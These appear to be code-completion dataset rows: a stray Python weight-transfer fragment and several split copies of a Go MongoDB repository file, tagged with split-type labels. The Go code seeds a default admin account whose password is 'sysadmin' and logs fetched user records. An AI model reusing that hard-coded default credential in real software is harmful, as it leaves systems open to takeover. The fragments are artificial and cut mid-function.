layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name)) | conditional_block |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) { |
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | identifier_body | |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
| func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | }
| random_line_split |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok |
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
